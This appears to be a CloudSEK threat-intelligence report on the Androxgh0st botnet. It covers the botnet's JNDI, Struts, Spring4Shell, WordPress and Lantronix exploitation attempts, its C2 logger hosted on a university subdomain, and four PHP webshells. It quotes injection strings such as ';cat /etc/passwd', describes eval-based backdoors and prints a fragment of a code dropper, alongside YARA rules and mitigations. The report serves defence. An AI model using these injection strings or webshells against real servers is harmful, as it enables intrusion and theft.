Executive Summary

CloudSEK’s recent investigation reveals that the Androxgh0st botnet has evolved significantly since its early activity in 2023, leveraging a wide range of Initial Access Vectors (IAVs). Misconfigured/vulnerable servers linked to academic institutions and public domains, such as University of California, San Diego's “USArhythms” subdomain, were found hosting command-and-control (C2)logger panels. The botnet exploits popular platforms (e.g., Apache Shiro, Spring framework, WordPress) and IoT devices (Lantronix), enabling remote code execution, sensitive data theft, and cryptomining. Evidence from the C2 logs highlight exploitation attempts using a plethora of command injection techniques. Webshells planted on compromised infrastructure facilitate persistent access and further payload deployment.

‍

Analysis 

Background

• Last year, CloudSEK’s TRIAD discovered that the Androxgh0st botnet has been exploiting over 20 vulnerabilities since at least August 2024. [Full Report]
• CISA released a security advisory in Jan 2024, raising awareness about the expansion of the Androxgh0st botnet.
• After CloudSEK’s report, CISA, in addition to other OEMs, acknowledged active exploitation of the vulnerabilities and added them to the KEV list.
• Recent findings revealed that the botnet has been operating since at least March 2023, and has weaponized several new web application exploits to be used as part of their arsenal, in addition to 4 webshells to be likely used as post exploitation tools.

‍

In our first report, CloudSEK predicted that Androxgh0st operators will introduce several new payloads into the mix by mid-2025. This report is aimed at understanding the evolution of the botnet, including key Initial Access Vectors(IAVs) that were weaponized in addition to our previous reporting. 

Analysis

• During our routine scans for malicious infrastructure hunting, CloudSEK’s TRIAD found command and control servers being used by the Androxgh0st botnet.

‍

‍

• The parent domain belongs to the ”University of California, San Diego”. 
• The subdomain “USArhythms” seems to be a portal that pertains to the USA Basketball Men's U19 National Team, selected for the 2025 FIBA Under-19 Basketball World Cup.
• As reported earlier, Androxgh0st prefers to host their logger infrastructure on compromised websites. Last year, the botnet operators hosted their logger on the website of a Jamaican events aggregator platform. This time, it's a university in the United States.
• As we can see, the servers are storing the requests from the botnet agents over time.

‍

‍

Initial Access Vectors - Androxgh0st Botnet 

‍

This marks a ~50% spike in the number of initial access vectors weaponized by Androxgh0st since our previous report.

‍

Apache Shiro, FasterXML jackson-databind JNDI Injection

The log entries utilizing "org.apache.shiro.jndi.JndiObjectFactory", org.apache.xbean.propertyeditor.JndiConverter, com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig with an RMI URL pointing to an "Exploit" on a C2 are classic attempts to exploit a Java Naming and Directory Interface (JNDI) injection vulnerability. This technique can lead to Remote Code Execution (RCE) on the targeted server. For Apache Shiro,

• Androxgh0st sends a request containing a specially crafted object that specifies the org.apache.shiro.jndi.JndiObjectFactory class. This class is known to be vulnerable to Java Naming and Directory Interface (JNDI) injection. 
• The resourceName field points to a malicious Remote Method Invocation (RMI) server controlled by the attacker.
• If the target server is vulnerable, it will connect to the attacker's server and execute the payload, leading to a compromise. 

Lines from the command logger:

‍

Unix Command Injection:

The simple yet effective ";cat /etc/passwd" command hidden within a queriesCnt parameter is a blatant attempt to execute arbitrary commands on a Unix-like system and steal sensitive user account information.

• The malware injects a shell command into a parameter that is likely to be executed by the server's operating system. 
• In this case, the command cat /etc/passwd is appended to a legitimate command, separated by a semicolon, to read the file containing user account information. 

Lines from the command logger:

‍

WordPress Plugin Vulnerability (CVE-2019-17574): 

The log explicitly references this CVE, targeting the "Popup Maker" plugin for WordPress in an attempt to exploit a known flaw.

• This attack directly targets a known vulnerability in the "Popup Maker" plugin for WordPress. 
• By setting the popmake_action to popup_sysinfo, the attacker is attempting to trigger a function in the plugin that discloses system information. 

Lines from the command logger:

‍

Lantronix WLANScanSSID Command Injection: 

The entries targeting the WLANScanSSID functionality with curlcommands embedded in the SSID parameter are indicative of attempts to exploit a command injection vulnerability, similar to CVE-2021-21881.

• The malware is exploiting a command injection vulnerability in the WLANScanSSID function of Lantronix devices. 
• It injects a curl command into the ssid parameter, forcing the device to make an HTTP request to a server controlled by the attacker.
• This confirms that the device is vulnerable and can be remotely controlled.

Lines from the command logger:

‍

Apache Struts OGNL Injection: 

A complex Object-Graph Navigation Language (OGNL) payload is present, a hallmark of attacks against the Apache Struts2 framework (e.g., CVE-2017-5638) that can result in RCE.

• This is a sophisticated attack that uses a complex Object-Graph Navigation Language (OGNL) payload.
• The payload is designed to manipulate the Java runtime environment on the server to bypass security restrictions. 
• The ultimate goal of this payload is to execute the cat /etc/passwd command, similar to the simpler command injection attack. 

Lines from the command logger:

‍

Spring Framework RCE (Spring4Shell): 

The manipulation of class.module.classLoader points to attempts to exploit the critical Spring4Shell vulnerability (CVE-2022-22965), which allows for remote code execution.

• The attacker is manipulating the class loader properties of the Spring Framework, a vulnerability known as Spring4Shell.
• By setting the class.module.classLoader.resources.context.configFile to a remote location, the attacker can trick the server into loading a malicious configuration file. 
• This can lead to Remote Code Execution (RCE), giving the attacker full control over the server. 

Lines from the command logger:

‍

Cryptomining

The presence of JSON-RPC requests like {"id": 1, "method": "getwork", "params": []} and {"id": 1, "method": "eth_getWork", "params": []} strongly suggests that the attackers are also deploying cryptocurrency mining software on the servers they manage to compromise. These commands are used to fetch mining tasks from a mining pool.

‍

‍

In addition, we found an array of webshells designed for various utilities.

‍

1. abuok.php (hex2bin + eval payload)

‍

• What it does:
  
  • Writes a PHP file that:
    
    • Suppresses errors.
    • Executes obfuscated code (via eval(hex2bin(...))).
    • Wrapped in junk "abu...ok" to perhaps bypass basic scanners.
• Payload behavior (decoded):
  
  • Defines a class N with methods __construct, __destruct, and e().
  • On __destruct(), it checks if $this->c[5] === 'P' and executes $this->e().
  • The e() function eventually calls eval(...) on posted PHP code ($_POST['abu']).
  • This is remote code execution via POST request.

‍

2. myabu.php (ROT13 obfuscation, eval POST)

‍

• What it does:
  
  • str_rot13("riny") = "eval".
  • This means: eval($_POST['abu']);
• Purpose: Classic PHP webshell accepting arbitrary code via POST.

‍

3. scwj.php (file upload shell)

‍

• Purpose: A file upload backdoor.
  
  • Enables the attacker to upload any file (e.g., more malware, webshells) to the server.

4. baocun.php (code dropper via textarea)

‍

$content = '<form method=\"post\"><textarea name=\"x\"></textarea><button>abuok</button></form><?php $_POST ",

            " file_put_contents(\"a.php\", $_POST[\"x\"]);?>';\r\n\r\nif (file_put_contents($filename, $content, FILE_APPEND) !": "= false) {\r\n    echo \"XRABUOK\";\r\n} else {\r\n    echo \"XRABUSB\";\r\n}\r\n?>\r\n"

‍

• Purpose: A code dropper.
  
  • Accepts input via POST in a textarea.
  • Write it to a.php.
• Why? To allow the attacker to plant a new script onto the system.

‍

IOCs

Impact

• Unauthorized access to critical infrastructure and academic domains.
• Data breaches exposing PII or sensitive configuration files.
• Compromised systems repurposed for cryptomining or hosting malware.
• Regulatory/legal exposure due to failure to patch known CVEs.
• Potential brand damage from misuse of trusted domains.

‍

Mitigations

• Patch all systems affected by listed CVEs (e.g., Shiro, Spring4Shell, Fastjson, Jackson).
• Restrict outbound RMI, LDAP, and JNDI access at the firewall.
• Monitor and harden CMS plugins, particularly “Popup Maker” on WordPress.
• Regularly audit file systems for unexpected PHP files.
• Use a WAF or runtime application self-protection (RASP) for web applications.

‍

Check for signs of compromise

• Look for PHP webshells with obfuscated payloads like eval(hex2bin(...)) or ROT13.
• Check logs for suspicious POST parameters like "abu" or shell commands.
• Detect requests with injected values like ";cat /etc/passwd" or OGNL expressions.
• Identify beaconing to .oast.me, .oast.today, .oast.fun, or similar domains.
• Review server logs for JNDI/RMI activity targeting class loaders or Jackson databind.
• To detect malicious uploads or runtime use of shells, place YARA scans on:
  
  • /var/www/
  • /tmp/
  • /uploads/
  • WordPress plugin folders

‍

YARA Rule: Androxgh0st_webshell_abuok_hex2bin

‍

rule Androxgh0st_webshell_abuok_hex2bin

{

    meta:

        description = "Detects Androxgh0st webshell using hex2bin + eval"

        author = "CloudSEK"

        webshell_variant = "abuok.php"

        severity = "high"

‍

    strings:

        $s1 = "error_reporting(0);" nocase

        $s2 = "eval(hex2bin(" nocase

        $s3 = "abu<?php" nocase

        $s4 = "XRABUOK" nocase

‍

    condition:

        filesize < 100KB and all of ($s*)

}

‍

YARA Rule: Androxgh0st_webshell_myabu_rot13_eval

‍

rule Androxgh0st_webshell_myabu_rot13_eval

{

    meta:

        description = "Detects Androxgh0st webshell using ROT13 eval"

        author = "CloudSEK"

        malware_family = "Androxgh0st"

        webshell_variant = "myabu.php"

        severity = "medium"

‍

    strings:

        $s1 = "str_rot13(\"riny\")" nocase

        $s2 = "new V($_POST[\"abu\"]);" nocase

        $s3 = "XRABUOK" nocase

‍

    condition:

        filesize < 50KB and all of ($s*)

}

YARA Rule: Androxgh0st_upload_shell_scwj

rule Androxgh0st_upload_shell_scwj

{

    meta:

        description = "Detects Androxgh0st file upload shell"

        author = "CloudSEK"

        webshell_variant = "scwj.php"

        severity = "medium"

‍

    strings:

        $s1 = "<input type=\"file\"" nocase

        $s2 = "move_uploaded_file($_FILES" nocase

        $s3 = "<?php" nocase

        $s4 = "XRABUOK" nocase

‍

    condition:

        filesize < 50KB and all of ($s*)

}

‍

YARA Rule: Androxgh0st_dropper_baocun

rule Androxgh0st_dropper_baocun

{

    meta:

        description = "Detects PHP code dropper used by Androxgh0st"

        author = "CloudSEK"

        webshell_variant = "baocun.php"

        severity = "medium"

‍

    strings:

        $s1 = "<textarea name=\"x\">" nocase

        $s2 = "file_put_contents(\"a.php\", $_POST[\"x\"]);" nocase

        $s3 = "XRABUOK" nocase

‍

    condition:

        filesize < 50KB and all of ($s*)

}

References

• *Intelligence source and information reliability - Wikipedia
• ^#Traffic Light Protocol - Wikipedia
• http://archiveiya74codqgiixo33q62qlrqtkgmcitqx5u2oeqnmn5bpcbiyd.onion/JEY7L